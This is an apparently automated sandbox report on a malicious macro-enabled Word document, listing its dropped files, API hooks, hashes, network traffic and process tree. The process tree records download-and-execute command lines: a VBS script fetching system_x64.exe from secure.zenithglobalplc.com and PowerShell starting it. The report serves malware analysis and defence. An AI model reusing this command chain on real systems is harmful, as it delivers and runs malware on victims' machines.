"cmd.exe" is creating a new process (Name: "%WINDIR%\System32\fc.exe", Handle: 88) - source
- API Call
- relevance
- 8/10
-
Dropped files
- details
-
"Copy_of_30ecfa4d51114c6b273d6de314ce9f56.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Wed Mar 11 22:33:00 2020 mtime=Wed Mar 11 22:33:00 2020 atime=Wed Mar 11 22:33:00 2020 length=95764 window=hide"
"presskey.cmd" has type "ASCII text with CRLF line terminators"
"tlofgkkjl15g5k.vbs" has type "ASCII text with CRLF line terminators"
"30ecfa4d51114c6b273d6de314ce9f56.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Wed Mar 11 22:29:28 2020 mtime=Wed Mar 11 22:29:28 2020 atime=Wed Mar 11 22:29:36 2020 length=427476 window=hide"
"~_ecfa4d51114c6b273d6de314ce9f56.doc" has type "data"
"presskey.jse" has type "ASCII text with CRLF line terminators"
"~_py_of_30ecfa4d51114c6b273d6de314ce9f56.docx" has type "data"
"My Pictures.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Read-Only Directory ctime=Sun Dec 3 11:06:16 2017 mtime=Wed Mar 11 23:10:00 2020 atime=Wed Mar 11 23:10:00 2020 length=0 window=hide"
"presskey2.cmd" has type "ASCII text with CRLF line terminators"
"My Documents.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Read-Only Directory ctime=Sun Dec 3 11:06:16 2017 mtime=Wed Mar 11 22:33:00 2020 atime=Wed Mar 11 22:33:00 2020 length=4096 window=hide"
"urlref_httpsecure.zenithglobalplc.comassetspluginsbootstrap-wizardsystem_x64.exe" has type "HTML document ASCII text"
"index.dat" has type "data"
"~WRS_3A453929-2FEF-4064-B533-8FC8672F0C80_.tmp" has type "data"
"F9WBNAXRJHNLDD2T43FV.temp" has type "data"
"D6FFDBE7.jpeg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 96x96 segment length 16 Exif Standard: [TIFF image data big-endian direntries=6 orientation=upper-left] baseline precision 8 789x559 frames 3"
"~WRD0000.tmp" has type "Microsoft Word 2007+"
"~WRS_62DEE603-9E85-4752-BC6A-2A98D0CC80A7_.tmp" has type "data"
"presskey.jse5" has type "ASCII text with CRLF line terminators"
"presskey.jse4" has type "ASCII text with CRLF line terminators"
"MSForms.exd" has type "data" - source
- Binary File
- relevance
- 3/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "C:\Windows\AppPatch\sysmain.sdb"
"WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\StaticCache.dat"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\user32.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{62DEE603-9E85-4752-BC6A-2A98D0CC80A7}.tmp"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\msctf.dll.mui"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{BD7D0D54-979F-4AA8-A467-47BAFD37B65B}.tmp" - source
- API Call
- relevance
- 7/10
-
Creates new processes
-
Network Related
-
Found potential URL in binary/memory
- details
-
Heuristic match: "secure.zenithglobalplc.com"
Heuristic match: "GET /assets/plugins/bootstrap-wizard/system_x64.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: secure.zenithglobalplc.com"
Pattern match: "https://secure.zenithglobalplc.com/assets/plugins/bootstrap-wizard/system_x64.exe"
Pattern match: "http://secure.zenithglobalplc.com/assets/plugins/bootstrap-wizard/system_x64.exe"
Heuristic match: "TRACERT chiark.greenend.org.uk"
Heuristic match: "112.240.168.192.in-addr.arpa"
Heuristic match: "113.240.168.192.in-addr.arpa"
Heuristic match: "161.12.124.64.in-addr.arpa"
Heuristic match: "18.29.125.64.in-addr.arpa"
Heuristic match: "183.85.36.23.in-addr.arpa"
Heuristic match: "2.240.168.192.in-addr.arpa"
Heuristic match: "21.25.125.64.in-addr.arpa"
Heuristic match: "218.31.125.64.in-addr.arpa"
Heuristic match: "229.197.13.212.in-addr.arpa"
Heuristic match: "230.30.125.64.in-addr.arpa"
Heuristic match: "231.240.168.192.in-addr.arpa"
Heuristic match: "232.240.168.192.in-addr.arpa"
Heuristic match: "237.30.125.64.in-addr.arpa"
Heuristic match: "239.169.153.194.in-addr.arpa"
Heuristic match: "34.224.66.195.in-addr.arpa"
Heuristic match: "5.2.5.d.b.b.2.d.9.1.4.1.7.8.d.a.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa"
Heuristic match: "53.30.125.64.in-addr.arpa"
Heuristic match: "70.169.153.194.in-addr.arpa"
Heuristic match: "79.169.153.194.in-addr.arpa"
Heuristic match: "b.4.e.5.2.5.d.4.b.3.0.6.4.7.1.e.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa"
Heuristic match: "chiark.greenend.org.uk"
Heuristic match: "f.6.d.7.1.b.a.3.5.c.e.9.0.a.1.6.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa"
Pattern match: "d9.QK/tjE7&97vI0VVVK~g'R?hMMR=0Yo^~_$Rw%~"
Pattern match: "j.gZ/%f"
Pattern match: "u.JUU/5qZca6QDg7`7Ws=%"
Heuristic match: "TRACERT chiark.greenend.org.uk" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
-
System Security
-
Creates or modifies windows services
- details
-
"cscript.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS")
"TRACERT.EXE" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS")
"NETSTAT.EXE" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Hooks API calls
- details
-
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Creates or modifies windows services
-
Unusual Characteristics
-
Drops a text file that contains suspicious strings (e.g. shell/ActiveX/DOM related)
- details
-
"presskey.cmd" contains indicator "WinHTTP" (Line: 25; Offset: 33)
"tlofgkkjl15g5k.vbs" contains indicator "WinHTTP" (Line: 23; Offset: 28) - source
- Binary File
- relevance
- 8/10
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "48121675" to virtual address "0x751783DC" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "b88011206dffe0" to virtual address "0x755E1368" (part of module "WS2_32.DLL")
"WINWORD.EXE" wrote bytes "e9fef37dee" to virtual address "0x75A3A00A" ("OleLoadFromStream@OLE32.DLL")
"WINWORD.EXE" wrote bytes "c04e3d7720543e77e0653e77b5383f770000000000d0fd7500000000c5eafd750000000088eafd7500000000e968477582283f77ee293f7700000000d2694775000000007dbbfd750000000009be477500000000ba18fd7500000000" to virtual address "0x76291000" (part of module "NSI.DLL")
"WINWORD.EXE" wrote bytes "a011206d" to virtual address "0x7595E324" (part of module "WININET.DLL")
"WINWORD.EXE" wrote bytes "e9c454bced" to virtual address "0x760B3F20" ("VariantClear@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "7f7ce082" to virtual address "0x6B329904" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "944ff382" to virtual address "0x63E90BA8" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "f8111675" to virtual address "0x751783C4" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "f8111675" to virtual address "0x7517834C" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "48121675" to virtual address "0x751783C0" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "48121675" to virtual address "0x75178348" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "c1a7dd82" to virtual address "0x64E978E4" (part of module "OART.DLL")
"WINWORD.EXE" wrote bytes "f8110000" to virtual address "0x75161408" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "9330f085" to virtual address "0x2F6A1B94" (part of module "WINWORD.EXE")
"WINWORD.EXE" wrote bytes "d5d9fd7530c6fd75e0c2fd7542c6fd7510c6fd75acdcfd75a0dffd7536dafd7587f1fd750000000091774f77c0904f777f6f4f771ffa4f77def44f77f2824f77857d4f7700000000" to virtual address "0x6D491000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "e9d732bced" to virtual address "0x760B47BA" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "48120000" to virtual address "0x751612DC" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "e96953bbed" to virtual address "0x760B3F8A" ("SysFreeString@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e9ab99beed" to virtual address "0x760B5D66" ("VariantChangeType@OLEAUT32.DLL") - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Drops a text file that contains suspicious strings (e.g. shell/ActiveX/DOM related)
File Details
30ecfa4d51114c6b273d6de314ce9f56
- Filename
- 30ecfa4d51114c6b273d6de314ce9f56
- Size
- 417KiB (427476 bytes)
- Type
- docx office
- Description
- Microsoft Word 2007+
- Architecture
- WINDOWS
- SHA256
- 5c4f89b78a4a4385a59e37e8f27addd76ba92ef6bea004efe8df0cc3b64e0cd2
- MD5
- 30ecfa4d51114c6b273d6de314ce9f56
- SHA1
- cc3de1f22e990fd00afb4476d48ed98e7bcd9803
- ssdeep
- 12288:4BbHTOsVda4OVI9KszGGntQWf/27hG+WJ:kbHTzd9KEYWf/27hG+WJ
Classification (TrID)
- 53.0% (.DOCM) Word Microsoft Office Open XML Format document (with Macro)
- 23.9% (.DOCX) Word Microsoft Office Open XML Format document
- 17.8% (.ZIP) Open Packaging Conventions container
- 4.0% (.ZIP) ZIP compressed archive
- 1.0% (.BIN) PrintFox/Pagefox bitmap (var. P)
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 7 processes in total.
-
WINWORD.EXE
/n "C:\30ecfa4d51114c6b273d6de314ce9f56.doc"
(PID: 2836)
-
cmd.exe
/c C:\MyImages\presskey.cmd
(PID: 3652)
- cscript.exe cscript //nologo C:\MyImages\tlofgkkjl15g5k.vbs http://secure.zenithglobalplc.com/assets/plugins/bootstrap-wizard/system_x64.exe C:\MyImages\Louu6hbte.exe (PID: 3720)
- powershell.exe powershell -C Sleep -s 3;Saps 'C:\MyImages\Louu6hbte.exe' (PID: 3272)
- TRACERT.EXE TRACERT chiark.greenend.org.uk (PID: 2504)
- NETSTAT.EXE (PID: 2704)
- fc.exe fc C:\MyImages\Louu6hbte.exe C:\MyImages\tlofgkkjl15g5k.vbs (PID: 2796)
-
cmd.exe
/c C:\MyImages\presskey.cmd
(PID: 3652)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
112.240.168.192.in-addr.arpa | - | - | - |
113.240.168.192.in-addr.arpa | - | - | - |
161.12.124.64.in-addr.arpa | - | - | - |
18.29.125.64.in-addr.arpa | - | - | - |
183.85.36.23.in-addr.arpa | - | - | - |
2.240.168.192.in-addr.arpa | - | - | - |
21.25.125.64.in-addr.arpa | - | - | - |
218.31.125.64.in-addr.arpa | - | - | - |
229.197.13.212.in-addr.arpa | - | - | - |
230.30.125.64.in-addr.arpa | - | - | - |
231.240.168.192.in-addr.arpa | - | - | - |
232.240.168.192.in-addr.arpa | - | - | - |
237.30.125.64.in-addr.arpa | - | - | - |
239.169.153.194.in-addr.arpa | - | - | - |
34.224.66.195.in-addr.arpa | - | - | - |
5.2.5.d.b.b.2.d.9.1.4.1.7.8.d.a.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa | - | - | - |
53.30.125.64.in-addr.arpa | - | - | - |
70.169.153.194.in-addr.arpa | - | - | - |
79.169.153.194.in-addr.arpa | - | - | - |
b.4.e.5.2.5.d.4.b.3.0.6.4.7.1.e.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa | - | - | - |
chiark.greenend.org.uk |
212.13.197.229
TTL: 299 |
- | United Kingdom |
f.6.d.7.1.b.a.3.5.c.e.9.0.a.1.6.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa | - | - | - |
secure.zenithglobalplc.com |
198.54.126.167
TTL: 1199 |
- | United States |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
198.54.126.167 |
80
TCP |
cscript.exe PID: 3720 |
United States |
198.54.126.167 |
443
TCP |
cscript.exe PID: 3720 |
United States |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
198.54.126.167:80 (secure.zenithglobalplc.com) | GET | secure.zenithglobalplc.com/assets/plugins/bootstrap-wizard/system_x64.exe | GET /assets/plugins/bootstrap-wizard/system_x64.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: secure.zenithglobalplc.com More Details |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
198.54.126.167 -> local:49207 (TCP) | Potentially Bad Traffic | ET INFO TLS Handshake Failure | 2029340 |
Extracted Strings
Extracted Files
-
Clean 2
-
-
~_ecfa4d51114c6b273d6de314ce9f56.doc
- Size
- 162B (162 bytes)
- Type
- data
- AV Scan Result
- 0/58
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- b60c0bb79b4b53294d99905c973caba3
- SHA1
- a7716d014025ca03b5324c8220e2459eea70b6b1
- SHA256
- a101d3605f8d1ca5cfb10c48dbdb24c45f2627c48f44a2bd2604b88c7b90d5f0
-
~_py_of_30ecfa4d51114c6b273d6de314ce9f56.docx
- Size
- 162B (162 bytes)
- Type
- data
- AV Scan Result
- 0/58
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- b60c0bb79b4b53294d99905c973caba3
- SHA1
- a7716d014025ca03b5324c8220e2459eea70b6b1
- SHA256
- a101d3605f8d1ca5cfb10c48dbdb24c45f2627c48f44a2bd2604b88c7b90d5f0
-
-
Informative Selection 2
-
-
presskey.cmd
- Size
- 22KiB (22213 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- Runtime Process
- cmd.exe (PID: 3652)
- MD5
- 2836814f6665dc9b5c9f544a53233d9a
- SHA1
- 6ce48257d3e32129b3d3913f83cd3753464e72a0
- SHA256
- e352c07b12ef694b97a4a8dbef754fc38e9a528d581b9c37eabe43f384a8a519
-
tlofgkkjl15g5k.vbs
- Size
- 11KiB (11620 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- Runtime Process
- cmd.exe (PID: 3652)
- MD5
- ffb1646370b9cba92efaaa4d06d90570
- SHA1
- 2b52bd6e08f5d06de942ec5a230b88e609dcb1c3
- SHA256
- 74289d34679d88b8e7ca47ebce78931ff79a21a9b26fdf79d0022d62ffa8209a
-
-
Informative 16
-
-
30ecfa4d51114c6b273d6de314ce9f56.LNK
- Size
- 573B (573 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Mar 11 22:29:28 2020, mtime=Wed Mar 11 22:29:28 2020, atime=Wed Mar 11 22:29:36 2020, length=427476, window=hide
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- eecfad643e1d92d120096ce62f80d798
- SHA1
- fc55cf71cc58b822d0f19038072eddd4c3ca90ab
- SHA256
- 56d49c45c3030420c9dac143133d4c3ff0c2e92054a9d5a90964e20d1294c55a
-
Copy_of_30ecfa4d51114c6b273d6de314ce9f56.LNK
- Size
- 1.2KiB (1209 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Mar 11 22:33:00 2020, mtime=Wed Mar 11 22:33:00 2020, atime=Wed Mar 11 22:33:00 2020, length=95764, window=hide
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- 7b625dc0502c63e9d0695d216c111ebf
- SHA1
- 7abe253bb7ded9ea180aad10f6bcfc97c6a3ebb1
- SHA256
- 60832d27c120e4f612e142aac5ceb1f475caf76d8681c7fccf2092d72417afce
-
My Documents.LNK
- Size
- 907B (907 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Sun Dec 3 11:06:16 2017, mtime=Wed Mar 11 22:33:00 2020, atime=Wed Mar 11 22:33:00 2020, length=4096, window=hide
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- c8a43fe93040cd237e827420c53f749d
- SHA1
- 6d3c52d3534d1e0b480bd84ff689b0a8f9eaf4cc
- SHA256
- 3f04638fa1ada1c27cd5825c136fc266b3c24a5f3b8c98ad5496316cddf5de95
-
My Pictures.LNK
- Size
- 902B (902 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Sun Dec 3 11:06:16 2017, mtime=Wed Mar 11 23:10:00 2020, atime=Wed Mar 11 23:10:00 2020, length=0, window=hide
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- 6507638c225396f72c599953ee017d0f
- SHA1
- 6ac0b90787efd153921809f9a16fa27ca08a914f
- SHA256
- d738ef8edf3452363c541153a57431bdae460f69bff10cfc87e4b9d8c6c77c66
-
index.dat
- Size
- 275B (275 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- c1f9ddd836dde706172db6fba6837cc5
- SHA1
- f6db43d8c33b2fdd7069d12cfad53d1b458c44ba
- SHA256
- e0917203011a9fa2ff7be97a1ab4aa9867497686008aaaf4f2d3531abe773078
-
F9WBNAXRJHNLDD2T43FV.temp
- Size
- 7.8KiB (8016 bytes)
- Type
- data
- Runtime Process
- powershell.exe (PID: 3272)
- MD5
- 45dcbd99748078a12fa1fc96db23d798
- SHA1
- afc574a66f18efb26ce6193d337acf32796473da
- SHA256
- 1fc6949ad94e52a2d12733c868308136dc5b38a8790aebeb1c1dc2f9beecc35d
-
D6FFDBE7.jpeg
- Size
- 80KiB (81478 bytes)
- Type
- img image
- Description
- JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=6, orientation=upper-left], baseline, precision 8, 789x559, frames 3
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- a6453d381dd4d9fa212425bbc24ebe63
- SHA1
- dde4fb6bd21a36c8a38ae43cf11ab07744f198c5
- SHA256
- 97876e203a341427b28d622547f1b8f8a992eaa45924acdeb4cde60d3c967b54
-
MSForms.exd
- Size
- 144KiB (147284 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- 4ca1945424877c7a36c581f6e4f0c85c
- SHA1
- 292e6860312c640c28187d07e743cddcea1b6397
- SHA256
- 54a1d09122ccd2c9a31b3ac01224d27ce6db338d132fcf8f13a98bb265ce691e
-
~WRD0000.tmp
- Size
- 256KiB (262144 bytes)
- Type
- docx office
- Description
- Microsoft Word 2007+
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- c29133ca6746f4fcce8c8636615fc540
- SHA1
- 2e748348ff2110f143e7d61543c29925001b5f42
- SHA256
- 5e9cd552d1cdc45c704f2f4a39d5ca60a63f9a6bd65a9a320828656699c6e00b
-
presskey.jse
- Size
- 160B (160 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- 31441d476eabded373bb68ea15aea83a
- SHA1
- 18e6bc47e344a171787cc3ce5414eff66ba7a495
- SHA256
- b907a34389a89bef3e9e9dff95f23092daf2140f329553b543cd99e8367ae96e
-
presskey.jse4
- Size
- 160B (160 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- 31441d476eabded373bb68ea15aea83a
- SHA1
- 18e6bc47e344a171787cc3ce5414eff66ba7a495
- SHA256
- b907a34389a89bef3e9e9dff95f23092daf2140f329553b543cd99e8367ae96e
-
presskey.jse5
- Size
- 330KiB (338244 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- 921352cc78f29a0f2a437d337d8c9a86
- SHA1
- 9b0adbf6865f01a44a1e06b0a7c53015d57e3abd
- SHA256
- a382ee16f41751f41b5628fb39612218d6b15a751c607c88fda39c65851860ca
-
presskey2.cmd
- Size
- 160B (160 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- 31441d476eabded373bb68ea15aea83a
- SHA1
- 18e6bc47e344a171787cc3ce5414eff66ba7a495
- SHA256
- b907a34389a89bef3e9e9dff95f23092daf2140f329553b543cd99e8367ae96e
-
urlref_httpsecure.zenithglobalplc.comassetspluginsbootstrap-wizardsystem_x64.exe
- Size
- 289B (289 bytes)
- Type
- html
- Description
- HTML document, ASCII text
- Runtime Process
- WINWORD.EXE (PID: 2836)
- Context
- http://secure.zenithglobalplc.com/assets/plugins/bootstrap-wizard/system_x64.exe
- MD5
- 3844776a61d76d74775b6eb522a05633
- SHA1
- af0c7e237a5a093aad891b6d254def86dcf36ce5
- SHA256
- 04dc115de46ed89b29f038d867e177d94d0bf9d1b09ebcff3e09c101af30e18c
-
~WRS_3A453929-2FEF-4064-B533-8FC8672F0C80_.tmp
- Size
- 1.5KiB (1536 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- 4762b383873fc5165529cd8b44ba808d
- SHA1
- 7ee51094dcc803db1bda8a98eb88a51d77200cd3
- SHA256
- 979366f76459e449e0a0ec057370797df97b8228b155b6b62faa3dcd2ea0df90
-
~WRS_62DEE603-9E85-4752-BC6A-2A98D0CC80A7_.tmp
- Size
- 1KiB (1024 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
Notifications
-
Runtime
- Network whitenoise filtering (Process) was applied
- Not all Falcon MalQuery lookups completed in time
- Not all IP/URL string resources were checked online
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "hooks-8" are available in the report
- Not all sources for indicator ID "mutant-0" are available in the report
- Not all sources for indicator ID "network-0" are available in the report
- Not all sources for indicator ID "registry-55" are available in the report
- Not all sources for indicator ID "registry-72" are available in the report
- Not all sources for indicator ID "string-43" are available in the report